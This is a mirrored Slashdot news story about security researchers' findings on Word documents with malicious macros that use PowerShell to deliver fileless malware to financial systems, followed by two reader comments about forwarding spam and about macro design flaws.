Slashdot Mirror

← Back to Stories (view on slashdot.org)

Docs With Malicious Macros Deliver Fileless Malware (csoonline.com)

Posted by BeauHD on from the monthly-subscription-to-malicious-malware dept.

itwbennett writes: Researchers from Palo Alto Networks warn that attackers are using Word documents with malicious macros and PowerShell to infect computers with fileless malware. The rogue PowerShell script performs a variety of checks on the computer aimed at finding systems that are used to conduct financial transactions and to avoid systems that belong to security researchers as well as medical and educational institutions. "Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat," the Palo Alto researchers said in a blog post. A similar combination of PowerShell and fileless malware was observed last week by researchers from the SANS Institute's Internet Storm Center.

2 of 39 comments (clear)

  1. Get one Get Many by rtb61 · · Score: 4, Insightful

    I got hit with a bundle of them, one after another after another, over a couple of weeks. I think I likely kept getting them because I did not read them but simply forwarded them to http://www.acma.gov.au/Citizen.... I assume as part of their spam analysis with a view to prosecution, those went into some ones more law focused inbox. Forwarding them on to your local authorities might not help much but it certainly doesn't hurt and it is still more satisfying than just blocking them and it might, just might lead to keeping the authorities appropriately busy and a prosecution occurring, one can only hope and a little hope is better than none at all. Oh yeah and I most certainly do not run M$ Office - Libre Office for me, for many, many reasons, least of which those much repeated attacks.

    --
    Chaos - everything, everywhere, everywhen
  2. Re:Word Macros by Anonymous Coward · · Score: 4, Insightful

    Sorry, if you still have this shit enabled in **2016**, you deserve the pwnag3.

    There's nothing wrong with macros, per se. The problem is massive design flaws like this:

    "The documents contained macros that, if allowed to run, execute a hidden instance of powershell.exe"

    A macro should be able to perform operations on a document, but there is absolutely no reason why a macro should be able to launch an external executable file. That is stupidity at a mind boggling level.